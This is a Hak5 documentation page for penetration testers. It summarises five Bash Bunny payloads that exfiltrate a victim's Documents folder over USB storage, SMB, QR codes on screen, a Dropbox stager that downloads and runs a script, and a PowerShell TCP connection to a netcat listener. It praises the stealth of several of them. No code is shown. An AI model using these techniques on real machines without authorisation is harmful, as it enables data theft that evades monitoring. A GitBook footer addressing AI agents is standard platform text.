> For the complete documentation index, see [llms.txt](https://documentation.hak5.org/bash-bunny/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://documentation.hak5.org/bash-bunny/beginner-guides/top-5-bash-bunny-exfiltration-payloads-to-steal-files.md).

# Top 5 Bash Bunny Exfiltration Payloads to "steal files"

As anyone in IT knows, two is one — one is none. It’s important to backup your documents. As a penetration testers know, exfiltration is a fancy word for an involuntary backup. To that end, the Bash Bunny features at storage attack mode capable of intelligent exfiltration, with gigs of high speed USB flash storage. It’s perfect for binary injection, staged payloads and more.

![](/files/2MSvGkDJ0b3nqmXHQuuF)

It’s also the most convenient way to configure the Bash Bunny, with an dedicated access to its USB Flash Storage. Just slide the payload switch to arming mode and plug the Bash Bunny into your computer or smartphone. As a standard flash drive, it’s simple to navigate and configure. Modify payloads on the fly by editing simple text files. Assign payloads to switch positions by copying files. Browse the entire payload library right from the flash storage. Even review captured data from the “loot” folder. It couldn’t be more straightforward.

## TOP 5 EXFILTRATION PAYLOADS

These are just some of our favorite exfiltration payloads. For the complete listing, check out the [Bash Bunny payload highlights](https://hak5.org/blogs/payloads/tagged/bash-bunny).

### 1.USB EXFILTRATOR

[USB Exfiltrator on Hak5 PayloadHub](https://payloadhub.com/blogs/payloads/exfiltrator-for-bash-bunny)

Exfiltrates files from the users Documents folder Saves to the loot folder on the Bash Bunny USB Mass Storage partition named by the victim hostname, date and timestamp.\ <br>

### 2. FASTER SMB EXFILTRATOR

[Faster SMB Exfiltrator on Hak5 PayloadHub](https://payloadhub.com/blogs/payloads/faster-smb-exfiltrator)

Exfiltrates select files from users's documents folder via SMB. Liberated documents will reside in Bash Bunny loot directory under `loot/smb_exfiltrator/HOSTNAME/DATE_TIME`

{% embed url="<https://youtu.be/VPhqD__lOBQ>" %}

This payload is a rewrite of a previous SMB exfiltration attack which uses a robocopy method to quickly exfiltrate loot in a multithreaded fashion. Further, an `EXFILTRATION_COMPLETE` file is used to indicate when the attack is finished.

### 3. OPTICAL EXFILTRATION

[Optical Exfiltration on Hak5 PayloadHub](https://payloadhub.com/blogs/payloads/optical-exfiltration)

This is a quick HID only attack to write an HTML/JS file to target machine and open a browser, to exfiltrate data Using QR Codes and a video recording device.

It's based on QR Extractor, which converts a selected file to base64, then chunks up the string based on the specified qr\_string\_size (Note: the larger the chunk size, the larger you'll need to set the qr\_image\_size, or you won't be able to read the QR Code). These Chunks are then converted into QR Codes and displayed in the browser and can be played back at a speed specified by the playback\_delay setting.

{% embed url="<https://youtu.be/sZpIiSfRMSw>" %}

We love this payload because it uses free-space-optics to exfiltrate data in such a way that no meaningful mass storage or network logs would be created. Check out the video on this novel attack!

### 4. DROPBOX EXFILTRATOR

[Dropbox Exfiltrator on Hak5 PayloadHub](https://payloadhub.com/blogs/payloads/dropbox-exfiltrator-proof-of-concept)

This is a proof-of-concept payload using a stager. That means the staged powershell payload will download and execute an `exfil.ps1` from dropbox which compresses the users documents folder and uploads it to dropbox.

{% embed url="<https://youtu.be/TBBT1c2zjms>" %}

It uses a powershell IWR/IEX method to compress and exfiltrate documents using a public Dropbox share. We love it because to any network traffic analyzer, it's just your ordinary encrypted Dropbox traffic.

### 5. POWERSHELL TCP EXTRACTOR

[Powershell TCP Extractor on Hak5 PayloadHub](https://payloadhub.com/blogs/payloads/powershell-tcp-extractor)

This payload copies data to temp directory, compresses the data as a zip file, and uses powershell tcp socket to extract to a listener on remote machine.

The netcat listener IP address and port is configurable. This can be adapted to use an off-site machine as the receiver, or even the Bash Bunny itself.&#x20;

### More Exfiltration Payloads for the Bash Bunny

These only illustrate a very few of the many techniques to an perform exfiltration attack with the Bash Bunny. See all the featured exfiltration payloads at [payloads.hak5.org](https://payloads.hak5.org)<br>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://documentation.hak5.org/bash-bunny/beginner-guides/top-5-bash-bunny-exfiltration-payloads-to-steal-files.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.